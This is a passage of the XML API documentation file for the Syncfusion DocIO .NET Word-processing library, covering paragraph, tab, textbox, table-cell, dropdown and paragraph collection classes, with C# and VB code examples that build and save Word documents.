        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.UnsafeRemoveAt(System.Int32)">
            <summary>
            Unsafe method for removes item at index.
            </summary>
            <param name="index">The index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.UnsafeAdd(Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Unsafe method for adds the item.
            </summary>
            <param name="item">The item.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.OnInsertComplete(System.Int32,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Occurs when entity is inserted.
            <exclude/>
            </summary>
            <param name="index">The zero-based index to insert the entity.</param>
            <param name="entity">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> to insert.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.OnRemove(System.Int32)">
            <summary>
            Occurs when entity is removed.
            <exclude/>
            </summary>
            <param name="index">The zero-based index to remove the entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.OnClear">
            <summary>
            Occurs when all items are removed.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates new item.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.GetTagItemName">
            <summary>
            Returns the name of xml tag.
            <exclude/>
            </summary>
            <returns>The <b>string</b> that represents the xml tag name.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItemCollection.GetCurrentWidget(System.Int32)">
            <summary>
            Get Current widget
            </summary>
            <param name="index"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItemCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> at the specified index from the collection. Read-only.
            </summary>
            <param name="index">The zero-based index of the paragraph item to get from the collection.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> at the specified index.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItemCollection.OwnerParagraph">
            <summary>
            Gets the owner paragraph of this paragraph item. Read-only.
            <exclude/>
            </summary>
            <value>The owner paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItemCollection.TypesOfElement">
            <summary>
            Gets the type of the elements present in the collection.
            <exclude/>
            </summary>
            <value>The <see cref="T:System.Type"/> collection that contains the types of the elements.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Range">
            <summary>
            Represents a collection of entities.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Range.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Range"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Range.CloneItemsTo(Syncfusion.DocIO.DLS.Range)">
            <summary>
            Clones the items to new collection.
            </summary>
            <param name="items">The items.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Range.ContainTextBodyItems">
            <summary>
            Contains the text body items.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Range.GetLastParagraphItemIndex">
            <summary>
            Lasts the index of the paragraph item.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Range.Items">
            <summary>
            Gets the items.
            </summary>
            <value>The items.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ShapeObjectTextCollection">
            <summary>
            Represents the collection of text for each shape object (textbox, rectangle, etc.).
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ShapeObjectTextCollection.m_textTable">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObjectTextCollection.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ShapeObjectTextCollection"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObjectTextCollection.AddTextBox(System.Int32,Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Add the specified text box to text collection of shape object with the specified shape Id.
            </summary>
            <param name="shapeId">The <b>integer </b> that specifie the shape Id.</param>
            <param name="textBox">The text box to be added to the collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObjectTextCollection.GetTextBox(System.Int32)">
            <summary>
            Returns the textbox with the specified shape Id.
            </summary>
            <param name="shapeId">The <b>integer </b> that specifies the shape Id.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ShapeObjectTextCollection.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TabCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.Tab"/> in the paragraph.
            </summary>
            <example>
            <para>The following code illustrates the how to add and remove tabs from the <see cref="T:Syncfusion.DocIO.DLS.TabCollection"/>.</para>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add tab at position 0;
                paragraph.ParagraphFormat.Tabs.AddTab();
                //Add tab stop at position 11
                Tab firstTab = paragraph.ParagraphFormat.Tabs.AddTab(11);
                //Add tab stop at position 62, with tab justification and tab leader.
                paragraph.ParagraphFormat.Tabs.AddTab(62, TabJustification.Left, TabLeader.Single);
                paragraph.AppendText("This sample\t illustrates the use of tabs in the paragraph. Tabs\t can be inserted or removed from the paragraph.");
                //Remove tab stop from the collection
                paragraph.ParagraphFormat.Tabs.RemoveByTabPosition(11);
                //Remove tab at index 0;
                paragraph.ParagraphFormat.Tabs.RemoveAt(0);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add tab at position 0;
                paragraph.ParagraphFormat.Tabs.AddTab()
                'Add tab stop at position 11
                Dim firstTab As Tab = paragraph.ParagraphFormat.Tabs.AddTab(11)
                'Add tab stop at position 62, with tab justification and tab leader.
                paragraph.ParagraphFormat.Tabs.AddTab(62, TabJustification.Left, TabLeader.[Single])
                paragraph.AppendText("This sample" &amp; vbTab &amp; " illustrates the use of tabs in the paragraph. Tabs" &amp; vbTab &amp; " can be inserted or removed from the paragraph.")
                'Remove tab stop from the collection
                paragraph.ParagraphFormat.Tabs.RemoveByTabPosition(11)
                'Remove tab at index 0;
                paragraph.ParagraphFormat.Tabs.RemoveAt(0)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TabCollection"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.FormatBase)">
            <summary>
            
            </summary>
            <param name="document"></param>
            <param name="owner"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.AddTab">
            <summary>
            Adds a new tab at the position 0.
            </summary>
            <returns>The newly added <see cref="T:Syncfusion.DocIO.DLS.Tab"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.AddTab(System.Single,Syncfusion.DocIO.DLS.TabJustification,Syncfusion.DocIO.DLS.TabLeader)">
            <summary>
            Adds the tab at the specified position with the tab justification and tab leader.
            </summary>
            <param name="position">The position of the tab.</param>
            <param name="justification">The type of tab justification.</param>
            <param name="leader">The type of tab leader.</param>
            <returns>The newly added <see cref="T:Syncfusion.DocIO.DLS.Tab"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.AddTab(System.Single)">
            <summary>
            Adds the tab at the specified position.
            </summary>
            <param name="position">The position of the tab.</param>
            <returns>The newly added <see cref="T:Syncfusion.DocIO.DLS.Tab"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.Clear">
            <summary>
            Removes all the tabs from the tab collection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.RemoveAt(System.Int32)">
            <summary>
            Removes the tab at the specified index from the tab collection.
            </summary>
            <param name="index">The zero-based index of the tab to be removed.</param>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.TabCollection"/>.</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.RemoveByTabPosition(System.Double)">
            <summary>
            Removes the tab present at the specified position from the tab collection.
            </summary>
            <param name="position">The position of the tab to be removed.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.AddTab(Syncfusion.DocIO.DLS.Tab)">
            <summary>
            Adds the tab.
            </summary>
            <param name="tab">The tab.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates the item.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.GetTagItemName">
            <summary>
            Returns the name of xml tag.
            <exclude/>
            </summary>
            <returns>The <b>string</b> that specifies the tag name.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.OnChange">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.Compare(Syncfusion.DocIO.DLS.TabCollection)">
            <summary>
            Compare Tabs 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.UpdateSourceFormatting(Syncfusion.DocIO.DLS.TabCollection)">
            <summary>
            Updates the tabs in source formatting 
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TabCollection.UpdateTabs(Syncfusion.DocIO.DLS.TabCollection)">
            <summary>
            Updates the tabs in source formatting 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TabCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.Tab"/> at the specified index. Read-only.
            </summary>
            <param name="index">The zero-based index of the tab.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Tab"/> instance.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.TabCollection"/>.</exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TabCollection.CancelOnChangeEvent">
            <summary>
            Gets or sets a value indicating whether to cancel OnChange event.
            </summary>
            <value>
            	If it specifies to cancel on change event, set to <c>true</c>.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextBoxCollection">
            <summary>
            Represents the collection of <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/> in the Word document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBoxCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBoxCollection.RemoveAt(System.Int32)">
            <summary>
            Removes a <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/> to remove.</param>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //open a template document
                WordDocument document = new WordDocument("Textbox.docx");
                //Remove the textbox at index one.
                document.TextBoxes.RemoveAt(1);
                //Save and close the document
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'open a template document
                Dim document As New WordDocument("Textbox.docx")
                'Remove the textbox at index one.
                document.TextBoxes.RemoveAt(1)
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBoxCollection.Clear">
            <summary>
            Removes all the textboxes from the document. 
            </summary><example>
            <code language = "C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //open a template document
                WordDocument document = new WordDocument("Textbox.docx");
                //Removes the textboxes from the document
                document.TextBoxes.Clear();
                //Save and close the document
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'open a template document
                Dim document As New WordDocument("Textbox.docx")
                'Removes the textboxes from the document
                document.TextBoxes.Clear()
                'Save and close the document
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBoxCollection.Add(Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Adds the specified textbox.
            </summary>
            <param name="textbox">The textbox.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBoxCollection.Remove(Syncfusion.DocIO.DLS.WTextBox)">
            <summary>
            Removes the specified textbox.
            </summary>
            <param name="textbox">The textbox.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBoxCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/> at the specified index from the <see cref="T:Syncfusion.DocIO.DLS.TextBoxCollection"/>.
            </summary>
            <param name="index">The zero-based index to get the <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/>.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBox"/> at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.TextBoxCollection"/>.</exception>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WCellCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> in the <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/>.
            </summary>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add new section
                IWSection section = document.AddSection();
                //Add new paragraph
                section.AddParagraph().AppendText("Price Details");
                section.AddParagraph();
                //Add a new table into Word document
                IWTable table = section.AddTable();
                //Add the first row into table
                WTableRow row = table.AddRow();
                //Create a new cell 
                WTableCell cell = new WTableCell(document);
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Item");
                //Add the cell to the cells collection.
                row.Cells.Add(cell);
                int index = row.Cells.IndexOf(cell);
                //Create a new cell 
                cell = new WTableCell(document);
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Price($)");
                //Add the cell to the cells collection.
                row.Cells.Insert(index + 1, cell);
                //Add the second row into table
                row = table.AddRow(true, false);
                //Add the first cell into second row
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Apple");
                //Add the second cell into second row
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("50");
                //Add the third row into table
                row = table.AddRow(true, false);
                //Add the first cell into third row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Orange");
                //Add the second cell into third row 
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("30");
                //Add the third cell into third row
                cell = row.AddCell();
                //Specify the cell width
                cell.Width = 200;
                cell.AddParagraph().AppendText("Banana");
                //Removes the specified cell.
                row.Cells.Remove(cell);
                //Save and close the document
                document.Save("Table.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add new section
                Dim section As IWSection = document.AddSection()
                'Add new paragraph
                section.AddParagraph().AppendText("Price Details")
                section.AddParagraph()
                'Add a new table into Word document
                Dim table As IWTable = section.AddTable()
                'Add the first row into table
                Dim row As WTableRow = table.AddRow()
                'Create a new cell 
                Dim cell As New WTableCell(document)
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Item")
                'Add the cell to the cells collection.
                row.Cells.Add(cell)
                Dim index As Integer = row.Cells.IndexOf(cell)
                'Create a new cell 
                cell = New WTableCell(document)
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Price($)")
                'Add the cell to the cells collection.
                row.Cells.Insert(index + 1, cell)
                'Add the second row into table
                row = table.AddRow(True, False)
                'Add the first cell into second row
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Apple")
                'Add the second cell into second row
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("50")
                'Add the third row into table
                row = table.AddRow(True, False)
                'Add the first cell into third row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Orange")
                'Add the second cell into third row 
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("30")
                'Add the third cell into third row
                cell = row.AddCell()
                'Specify the cell width
                cell.Width = 200
                cell.AddParagraph().AppendText("Banana")
                'Removes the specified cell.
                row.Cells.Remove(cell)
                'Save and close the document
                document.Save("Table.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.#ctor(Syncfusion.DocIO.DLS.WTableRow)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WCellCollection"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/> instance.
            </summary>
            <param name="owner">The <see cref="T:Syncfusion.DocIO.DLS.WTableRow"/> to has this cell collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.Add(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Adds the specified <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> to the <see cref="T:Syncfusion.DocIO.DLS.WCellCollection"/>.
            </summary>
            <param name="cell">The <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> to be added.</param>
            <returns>The zero-based index of the cell.</returns>
            <exception cref="T:System.ArgumentException">The number of cells must be between 1 and 63.</exception>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.OnClear">
            <summary>
            Removes all the items from the collection.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.Insert(System.Int32,Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Inserts a specified <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> at the specified index in collection.
            </summary>
            <param name="index">The zero-based index to insert the cell.</param>
            <param name="cell">The <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> to be inserted.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.IndexOf(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Returns the index of a specified <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> in the collection.
            </summary>
            <param name="cell">The <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> to find the index.</param>
            <returns>The zero-based index of the specified cell.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.Remove(Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            Removes the specified <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> from the collection.
            </summary>
            <param name="cell">The <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> to be removed from the collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.RemoveAt(System.Int32)">
            <summary>
            Removes the <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> at the specified index from the collection.
            </summary>
            <param name="index">The zero-based index of the cell.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.RemoveCellBookmark(System.Int32)">
            <summary>
            Removes the cell bookmark.
            </summary>
            <param name="cell">The cell.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.GetTagItemName">
            <summary>
            Returns the name of the xml tag.
            <exclude/>
            </summary>
            <returns>The <b>string </b> that specifies the tag name.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates a new cell.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> instance.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> instance.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.CloneTo(Syncfusion.DocIO.DLS.EntityCollection)">
            <summary>
            Clones all cells to destination collection.
            </summary>
            <param name="destColl">The destination collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.OnInsertCell(System.Int32,Syncfusion.DocIO.DLS.CellFormat)">
            <summary>
            Called when cell inserted to cell collection.
            </summary>
            <param name="index">The index.</param>
            <param name="cellFormat">The cell format.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WCellCollection.OnRemoveCell(System.Int32)">
            <summary>
            Called when cell removed from cell collection.
            </summary>
            <param name="index">The index.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCellCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> at the specified index.
            </summary>
            <param name="index">The zero-based index of the <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> to get.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTableCell"/> at the specified index.</value>
            <exception cref="T:System.ArgumentOutOfRangeException">The index is not valid in the <see cref="T:Syncfusion.DocIO.DLS.WCellCollection"/>.</exception>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WCellCollection.TypesOfElement">
            <summary>
            Gets the type of the elements present in the collection.
            <exclude/>
            </summary>
            <value>The <see cref="T:System.Type"/> collection that contains the types of the elements.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WDropDownCollection">
            <summary>
            Represent a collection of <see cref="T:Syncfusion.DocIO.DLS.WDropDownItem"/> objects.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownCollection.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WDropDownCollection"/> class.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownCollection.Add(System.String)">
            <summary>
            Adds the item.
            </summary>
            <param name="text">The text.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownCollection.Remove(System.Int32)">
            <summary>
            Removes DropDownItems by index.
            </summary>
            <param name="index">The index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownCollection.Clear">
            <summary>
            Clears this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownCollection.Add(Syncfusion.DocIO.DLS.WDropDownItem)">
            <summary>
            Adds the item.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownCollection.CloneTo(Syncfusion.DocIO.DLS.WDropDownCollection)">
            <summary>
            Clones items to.
            </summary>
            <param name="destColl">The destination collection.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownCollection.CreateItem(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Creates the item.
            <exclude/>
            </summary>
            <param name="reader">The reader.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownCollection.GetTagItemName">
            <summary>
            Gets name of xml tag
            <exclude/>
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WDropDownCollection.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WDropDownCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WDropDownItem"/> at the specified index.
            </summary>
            <value></value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WParagraphCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> objects.
            </summary>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument("Template.docx");
                //Find the specified text from the document
                TextSelection selection = document.Find("paragraph", false, false);
                WTextRange range = selection.GetAsOneRange();
                //Get its owner paragraph
                WParagraph paragraph = range.OwnerParagraph;
                WTextBody textbody = paragraph.OwnerTextBody;
                //Get the collection of paragraphs in the section
                WParagraphCollection collection = (WParagraphCollection)textbody.Paragraphs;
                //Get the index of the paragraph
                int index = collection.IndexOf(range.OwnerParagraph);
                paragraph = new WParagraph(document);
                paragraph.AppendText("hello world");
                //Insert new item
                collection.Insert(index + 1, paragraph);
                //Removes paragraph at index zero
                collection.RemoveAt(0);
                //Save and close the paragraph.           
                document.Save("Result.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument("Template.docx")
                'Find the specified text from the document
                Dim selection As TextSelection = document.Find("paragraph", False, False)
                Dim range As WTextRange = selection.GetAsOneRange()
                'Get its owner paragraph
                Dim paragraph As WParagraph = range.OwnerParagraph
                Dim textbody As WTextBody = paragraph.OwnerTextBody
                'Get the collection of paragraphs in the section
                Dim collection As WParagraphCollection = DirectCast(textbody.Paragraphs, WParagraphCollection)
                'Get the index of the paragraph
                Dim index As Integer = collection.IndexOf(range.OwnerParagraph)
                paragraph = New WParagraph(document)
                paragraph.AppendText("hello world")
                'Insert new item
                collection.Insert(index - 1, paragraph)
                'Removes paragraph at index zero
                collection.RemoveAt(0)
                'Save and close the paragraph.           
                document.Save("Result.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IWParagraphCollection">
            <summary>
            Represents a collection of <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/>.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraphCollection.Add(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Adds a paragraph to the end of collection.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraphCollection.Insert(System.Int32,Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Inserts a paragraph into collection at the specified index.
            </summary>
            <param name="index">The index.</param>
            <param name="paragraph">The paragraph.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraphCollection.IndexOf(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Returns the zero-based index of the specified paragraph.
            </summary>
            <param name="paragraph">The paragraph.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraphCollection.RemoveAt(System.Int32)">
            <summary>
            Removes the paragraph at the specified index from the collection. 
            </summary>
            <param name="index">The index.</param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraphCollection.Item(System.Int32)">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.IWParagraph"/> at the specified index.
            </summary>
            <value></value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphCollection.#ctor(Syncfusion.DocIO.DLS.BodyItemCollection)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WParagraphCollection"/> class with the specified 
            collection of text body items.
            </summary>
            <param name="bodyItems">The collection of text body items.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphCollection.Add(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Adds a paragraph to the collection.
            </summary>
            <param name="paragraph">The paragraph to be added.</param>
            <returns>The zero-based index of the added paragraph.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphCollection.Contains(Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Determines whether the <see cref="T:Syncfusion.DocIO.DLS.WParagraphCollection"/> contains a specified paragraph.
            </summary>
            <param name="paragraph">The paragraph to be found.</param>
            <returns><b>True</b> if paragraph is found; otherwise, <b>false</b>.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraphCollection.Insert(System.Int32,Syncfusion.DocIO.DLS.IWParagraph)">
            <summary>
            Inserts the specified paragraph into collection at the specified index.
            </summary>
